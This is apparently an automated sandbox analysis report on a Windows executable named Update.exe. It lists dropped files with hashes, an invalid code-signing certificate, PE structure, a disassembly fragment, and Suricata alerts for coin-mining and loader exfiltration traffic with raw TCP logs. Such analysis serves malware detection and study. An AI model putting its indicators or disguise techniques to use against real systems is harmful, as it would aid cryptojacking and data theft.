                                                            SHA-256:256FEED6884A0C4E1A02D7BCF6A2A2A239D222A9059B767FB0E52A5A39A5DD04
                                                            SHA-512:9D922BC69D448743780F88C60EF9E195CE0D5887F4C00AB53D7E5E835140E1E12009A5D71308A9499265A67770BB97196D796B05878E3839C9CD9F0D1E4548DB
                                                            Malicious:false
                                                            Preview:.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\yidhhzbx\yidhhzbx.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\yidhhzbx\yidhhzbx.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longe

                                                            C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):64
                                                            Entropy (8bit):1.1510207563435464
                                                            Encrypted:false
                                                            SSDEEP:3:Nlllul2lllllZ:NllUClll
                                                            MD5:4D98AF7F487E62A9C1D44B02674BAB7E
                                                            SHA1:1B492B2208949EB7F18C32F309C296B4258DBA65
                                                            SHA-256:1E3ED9CE6343DA27C6759A0F05D6DD0B92B3A9C63B6492A2DA4E4F371D9F56DA
                                                            SHA-512:60EC859B84836E865E767FE858E70ACEC6F0FB8077B2E51D6CB4095533433B791C9A16396D69279C7F896DF003A1ED6656087B43EFA16523DA4026317CBB49E6
                                                            Malicious:false
                                                            Preview:@...e.................................:..............@..........

                                                            C:\Windows\Temp\__PSScriptPolicyTest_1oo3oavh.1nn.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Windows\Temp\__PSScriptPolicyTest_eifcxopy.csd.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Windows\Temp\__PSScriptPolicyTest_i0ujtrnw.4fd.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Windows\Temp\__PSScriptPolicyTest_jinvyoo5.hud.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Windows\Temp\jxokwqntprmq.sys

                                                            Download File
                                                            Process:C:\ProgramData\bmqxekewprir\nfblozsybbjy.exe
                                                            File Type:PE32+ executable (native) x86-64, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):14544
                                                            Entropy (8bit):6.2660301556221185
                                                            Encrypted:false
                                                            SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                            MD5:0C0195C48B6B8582FA6F6373032118DA
                                                            SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                            SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                            SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 5%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                                                            Static File Info

                                                            General

                                                            File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                            Entropy (8bit):7.994172374928004
                                                            TrID:
                                                            • Win64 Executable GUI (202006/5) 92.65%
                                                            • Win64 Executable (generic) (12005/4) 5.51%
                                                            • Generic Win/DOS Executable (2004/3) 0.92%
                                                            • DOS Executable Generic (2002/1) 0.92%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:Update.exe
                                                            File size:8'514'937 bytes
                                                            MD5:aab47056de8f4ba6869eafae3a5eba7b
                                                            SHA1:75c6e05524d62adeedc0258081a813db6803467a
                                                            SHA256:cd809723bc2b248ad6e546c36922e4a3f8b3d8bfdcf7d1448f1307ce7de27118
                                                            SHA512:432797a04402b29abff6db052b8d258967edfcbbee08aa3b78d3337b9aa8ede38893784705c87a5ea4298c20580b0bb690881e1cb52238a26213ec91df9d5758
                                                            SSDEEP:196608:9tumWeyBtU/LbDvCUs4WsOjmFwDRxtYSHdK34kdai7bN3m2Lsz:6JBtUt8K2pM9B3Q2C
                                                            TLSH:8F863344234209F5D8F7227D8892D55AE6B5B8115780CACF83F0CB256E2B7E05F3BB5A
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Zpc.Zpc.Zpc...`.]pc...f..pc...g.Ppc.....Ypc...`.Spc...g.Kpc...f.rpc...b.Qpc.Zpb..pc.O.g.Cpc.O.a.[pc.RichZpc.........PE..d..

                                                            File Icon

                                                            Icon Hash:90cececece8e8eb0

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x14000cdb0
                                                            Entrypoint Section:.text
                                                            Digitally signed:true
                                                            Imagebase:0x140000000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x66DCA365 [Sat Sep 7 19:03:01 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:6
                                                            OS Version Minor:0
                                                            File Version Major:6
                                                            File Version Minor:0
                                                            Subsystem Version Major:6
                                                            Subsystem Version Minor:0
                                                            Import Hash:72c4e339b7af8ab1ed2eb3821c98713a

                                                            Authenticode Signature

                                                            Signature Valid:false
                                                            Signature Issuer:CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
                                                            Signature Validation Error:The digital signature of the object did not verify
                                                            Error Number:-2146869232
                                                            Not Before, Not After
                                                            • 29/09/2021 01:00:00 29/09/2024 00:59:59
                                                            Subject Chain
                                                            • CN=Akeo Consulting, O=Akeo Consulting, S=Donegal, C=IE, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=IE, SERIALNUMBER=407950
                                                            Version:3
                                                            Thumbprint MD5:5C82B2D08EFE6EE0794B52D4309C5F37
                                                            Thumbprint SHA-1:3DBC3A2A0E9CE8803B422CFDBC60ACD33164965D
                                                            Thumbprint SHA-256:60E992275CC7503A3EBA5D391DB8AEAAAB001402D49AEA3F7F5DA3706DF97327
                                                            Serial:00BFB15001BBF592D4962A7797EA736FA3

                                                            Entrypoint Preview

                                                            Instruction
                                                            dec eax
                                                            sub esp, 28h
                                                            call 00007FA51CB0146Ch
                                                            dec eax
                                                            add esp, 28h
                                                            jmp 00007FA51CB0108Fh
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            dec eax
                                                            sub esp, 28h
                                                            call 00007FA51CB01838h
                                                            test eax, eax
                                                            je 00007FA51CB01233h
                                                            dec eax
                                                            mov eax, dword ptr [00000030h]
                                                            dec eax
                                                            mov ecx, dword ptr [eax+08h]
                                                            jmp 00007FA51CB01217h
                                                            dec eax
                                                            cmp ecx, eax
                                                            je 00007FA51CB01226h
                                                            xor eax, eax
                                                            dec eax
                                                            cmpxchg dword ptr [0003577Ch], ecx
                                                            jne 00007FA51CB01200h
                                                            xor al, al
                                                            dec eax
                                                            add esp, 28h
                                                            ret
                                                            mov al, 01h
                                                            jmp 00007FA51CB01209h
                                                            int3
                                                            int3
                                                            int3
                                                            dec eax
                                                            sub esp, 28h
                                                            test ecx, ecx
                                                            jne 00007FA51CB01219h
                                                            mov byte ptr [00035765h], 00000001h
                                                            call 00007FA51CB00965h
                                                            call 00007FA51CB01C50h
                                                            test al, al
                                                            jne 00007FA51CB01216h
                                                            xor al, al
                                                            jmp 00007FA51CB01226h
                                                            call 00007FA51CB0E76Fh
                                                            test al, al
                                                            jne 00007FA51CB0121Bh
                                                            xor ecx, ecx
                                                            call 00007FA51CB01C60h
                                                            jmp 00007FA51CB011FCh
                                                            mov al, 01h
                                                            dec eax
                                                            add esp, 28h
                                                            ret
                                                            int3
                                                            int3
                                                            inc eax
                                                            push ebx
                                                            dec eax
                                                            sub esp, 20h
                                                            cmp byte ptr [0003572Ch], 00000000h
                                                            mov ebx, ecx
                                                            jne 00007FA51CB01279h
                                                            cmp ecx, 01h
                                                            jnbe 00007FA51CB0127Ch
                                                            call 00007FA51CB017AEh
                                                            test eax, eax
                                                            je 00007FA51CB0123Ah
                                                            test ebx, ebx
                                                            jne 00007FA51CB01236h
                                                            dec eax
                                                            lea ecx, dword ptr [00035716h]
                                                            call 00007FA51CB0E562h

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x3ca5c0x78.rdata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x470000x93c.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x440000x2250.pdata
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x81c9310x2448
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x480000x764.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x3a0800x1c.rdata
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x39f400x140.rdata
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x2b0000x4a0.rdata
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x10000x29f000x2a000a6c3b829cc8eaabb1a474c227e90407fFalse0.5514206659226191data6.487493643901088IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rdata0x2b0000x12a500x12c0079cd9bfcffb6d908c061c17bc501b09bFalse0.5245442708333333data5.7527771249182145IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .data0x3e0000x53f80xe00dba0caeecab624a0ccc0d577241601d1False0.134765625data1.8392217063172436IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .pdata0x440000x22500x2400181312260a85d10a1454ba38901c499bFalse0.4705946180555556data5.290347578351011IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .rsrc0x470000x93c0xa00c567e0d82f2f34ef48fc7a0234a9b897False0.426953125data5.104907785610082IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0x480000x7640x800816c68eeb419ee2c08656c31c06a0fffFalse0.5576171875data5.2809528666624175IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_VERSION0x470a00x38cPGP symmetric key encrypted data - Plaintext or unencrypted data0.46255506607929514
                                                            RT_MANIFEST0x4742c0x50dXML 1.0 document, ASCII text0.4694508894044857

                                                            Imports

                                                            DLLImport
                                                            USER32.dllCreateWindowExW, ShutdownBlockReasonCreate, MsgWaitForMultipleObjects, ShowWindow, DestroyWindow, RegisterClassW, DefWindowProcW, PeekMessageW, DispatchMessageW, TranslateMessage, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
                                                            COMCTL32.dll
                                                            KERNEL32.dllGetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, LCMapStringW, CompareStringW, FlsFree, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, FormatMessageW, GetLastError, GetModuleFileNameW, LoadLibraryExW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, GetEnvironmentStringsW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, DeleteFileW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObject, Sleep, GetCurrentProcess, TerminateProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LocalFree, SetConsoleCtrlHandler, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FlsSetValue, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, CreateDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue
                                                            ADVAPI32.dllOpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
                                                            GDI32.dllSelectObject, DeleteObject, CreateFontIndirectW

                                                            Network Behavior

                                                            Suricata IDS Alerts

                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2024-09-09T06:30:59.233515+02002826930ETPRO COINMINER XMR CoinMiner Usage2192.168.2.44974345.76.89.7080TCP
                                                            2024-09-09T06:31:19.072972+02002036289ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)2192.168.2.4529041.1.1.153UDP
                                                            2024-09-09T06:31:27.743317+02002857751ETPRO MALWARE SynthIndi Loader Exfiltration Activity (POST)1192.168.2.449745149.154.167.220443TCP

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Sep 9, 2024 06:31:19.082978010 CEST4974380192.168.2.445.76.89.70
                                                            Sep 9, 2024 06:31:19.088243961 CEST804974345.76.89.70192.168.2.4
                                                            Sep 9, 2024 06:31:19.088350058 CEST4974380192.168.2.445.76.89.70
                                                            Sep 9, 2024 06:31:19.088500977 CEST4974380192.168.2.445.76.89.70
                                                            Sep 9, 2024 06:31:19.093233109 CEST804974345.76.89.70192.168.2.4
                                                            Sep 9, 2024 06:31:19.728723049 CEST804974345.76.89.70192.168.2.4
                                                            Sep 9, 2024 06:31:19.819551945 CEST4974380192.168.2.445.76.89.70
                                                            Sep 9, 2024 06:31:26.249491930 CEST4974480192.168.2.4208.95.112.1
                                                            Sep 9, 2024 06:31:26.254352093 CEST8049744208.95.112.1192.168.2.4
                                                            Sep 9, 2024 06:31:26.254456997 CEST4974480192.168.2.4208.95.112.1
                                                            Sep 9, 2024 06:31:26.254575968 CEST4974480192.168.2.4208.95.112.1
                                                            Sep 9, 2024 06:31:26.259346008 CEST8049744208.95.112.1192.168.2.4
                                                            Sep 9, 2024 06:31:26.798688889 CEST8049744208.95.112.1192.168.2.4
                                                            Sep 9, 2024 06:31:26.882103920 CEST4974480192.168.2.4208.95.112.1
                                                            Sep 9, 2024 06:31:27.069159985 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.069185972 CEST44349745149.154.167.220192.168.2.4
                                                            Sep 9, 2024 06:31:27.069251060 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.088044882 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.088061094 CEST44349745149.154.167.220192.168.2.4
                                                            Sep 9, 2024 06:31:27.740217924 CEST44349745149.154.167.220192.168.2.4
                                                            Sep 9, 2024 06:31:27.740598917 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.740628004 CEST44349745149.154.167.220192.168.2.4
                                                            Sep 9, 2024 06:31:27.741667032 CEST44349745149.154.167.220192.168.2.4
                                                            Sep 9, 2024 06:31:27.741717100 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.742543936 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.742609978 CEST44349745149.154.167.220192.168.2.4
                                                            Sep 9, 2024 06:31:27.742880106 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.742891073 CEST44349745149.154.167.220192.168.2.4
                                                            Sep 9, 2024 06:31:27.742976904 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.743011951 CEST44349745149.154.167.220192.168.2.4
                                                            Sep 9, 2024 06:31:27.743091106 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.743134022 CEST44349745149.154.167.220192.168.2.4
                                                            Sep 9, 2024 06:31:27.743235111 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.743264914 CEST44349745149.154.167.220192.168.2.4
                                                            Sep 9, 2024 06:31:27.743347883 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.743376970 CEST44349745149.154.167.220192.168.2.4
                                                            Sep 9, 2024 06:31:27.743376970 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.743386030 CEST44349745149.154.167.220192.168.2.4
                                                            Sep 9, 2024 06:31:27.743443012 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.743453026 CEST44349745149.154.167.220192.168.2.4
                                                            Sep 9, 2024 06:31:27.743470907 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.743479013 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.743480921 CEST44349745149.154.167.220192.168.2.4
                                                            Sep 9, 2024 06:31:27.743489027 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.743489981 CEST44349745149.154.167.220192.168.2.4
                                                            Sep 9, 2024 06:31:27.743498087 CEST44349745149.154.167.220192.168.2.4
                                                            Sep 9, 2024 06:31:27.743500948 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.743506908 CEST44349745149.154.167.220192.168.2.4
                                                            Sep 9, 2024 06:31:27.743527889 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.743535995 CEST44349745149.154.167.220192.168.2.4
                                                            Sep 9, 2024 06:31:27.743551016 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.743568897 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.743582010 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.743617058 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.743632078 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.743654966 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.743664980 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.743684053 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.743700027 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.743737936 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.743746042 CEST44349745149.154.167.220192.168.2.4
                                                            Sep 9, 2024 06:31:27.743767977 CEST44349745149.154.167.220192.168.2.4
                                                            Sep 9, 2024 06:31:27.743844986 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.743864059 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.743880033 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.743946075 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.743958950 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.744009018 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.744061947 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.744067907 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.744087934 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.757467985 CEST44349745149.154.167.220192.168.2.4
                                                            Sep 9, 2024 06:31:27.757682085 CEST44349745149.154.167.220192.168.2.4
                                                            Sep 9, 2024 06:31:27.757711887 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.757730007 CEST44349745149.154.167.220192.168.2.4
                                                            Sep 9, 2024 06:31:27.757730007 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.757792950 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.757833958 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.757853031 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.757927895 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.757939100 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.757952929 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.757952929 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.757972002 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.758009911 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.758024931 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.762242079 CEST44349745149.154.167.220192.168.2.4
                                                            Sep 9, 2024 06:31:27.762422085 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.762443066 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.762497902 CEST44349745149.154.167.220192.168.2.4
                                                            Sep 9, 2024 06:31:27.762527943 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.762532949 CEST44349745149.154.167.220192.168.2.4
                                                            Sep 9, 2024 06:31:27.762547970 CEST44349745149.154.167.220192.168.2.4
                                                            Sep 9, 2024 06:31:27.762643099 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.762696028 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.762729883 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.762784004 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.762795925 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.762810946 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.762810946 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.762829065 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:27.767061949 CEST44349745149.154.167.220192.168.2.4
                                                            Sep 9, 2024 06:31:28.578727007 CEST44349745149.154.167.220192.168.2.4
                                                            Sep 9, 2024 06:31:28.578815937 CEST44349745149.154.167.220192.168.2.4
                                                            Sep 9, 2024 06:31:28.578978062 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:28.579569101 CEST49745443192.168.2.4149.154.167.220
                                                            Sep 9, 2024 06:31:28.593275070 CEST4974480192.168.2.4208.95.112.1
                                                            Sep 9, 2024 06:31:28.598370075 CEST8049744208.95.112.1192.168.2.4
                                                            Sep 9, 2024 06:31:28.598489046 CEST4974480192.168.2.4208.95.112.1
                                                            Sep 9, 2024 06:31:32.982774019 CEST804974345.76.89.70192.168.2.4
                                                            Sep 9, 2024 06:31:33.132112980 CEST4974380192.168.2.445.76.89.70
                                                            Sep 9, 2024 06:31:33.302229881 CEST804974345.76.89.70192.168.2.4
